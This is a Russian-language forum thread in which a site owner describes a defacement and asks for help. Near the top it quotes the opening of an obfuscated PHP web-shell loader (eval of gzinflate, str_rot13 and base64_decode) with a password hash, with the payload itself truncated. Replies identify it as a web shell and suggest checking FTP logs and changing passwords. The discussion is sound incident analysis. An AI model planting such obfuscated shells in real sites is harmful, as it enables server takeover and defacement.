Взломали сайт. Помогите выянить причину.

Аватар пользователя VasyOK VasyOK 28 марта 2015 в 6:46

В один прекрасный момент в корневой папке htaccess.php появилось

<?php

$auth_pass = "596a96cc7bf9108cd896f33c44aedc8a";

?>

<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/pXR9AQ7oHfDwАБРАКАДАБРА

Результат:
1) Сайт дефейснут: в index.php текст левый.
2) Админский пароль сменен

Как это произошло, идеи, пердположения?

Подозрение на чей-то ФТП-вирусняк. К сайту несколько человек через ФТП доступ имели. Триппер конечно вылечен.

0 Thanks

Комментарии

Аватар пользователя bsyomov bsyomov 28 марта 2015 в 10:14

«отрубай фтп, используй sftp»
Это отчасти правильно, но во многих случаях, слишком радикально и не всегда возможно. Ну и от кражи пароля спасает только при правильном использовании...

Если есть подозрение на ftp, это можно проверить, посмотрев логи ftp сервера.
Соответственно, если подтвердится - будет информация, кому надо лечить машинку, ну и пароли естественно надо сменить.
Если нет, то надо дальше искать путь взлома...

Аватар пользователя bsyomov bsyomov 29 марта 2015 в 12:47

Это php shell - средство выполнения кода на сервере, возможно специализированная спамилка. В принципе, выяснять что это конкретно, нет особого смысла. Это, конечно, надо удалить, но этого мало. Надо понять, как он туда попал, и пресечь возможность заливать такое в будущем.

Аватар пользователя VasyOK VasyOK 2 апреля 2015 в 8:48

В ходе разбора полетов на нашем религиозном собрании выяснилось.
Это все произошло тогда когда пароли давали нескольким кандидатам на сотрудничество.
Пароль от сайта сменил разработчик. Кто на сайт левый php файл со ссылкой на чужой сайт закинул - остается вопросом.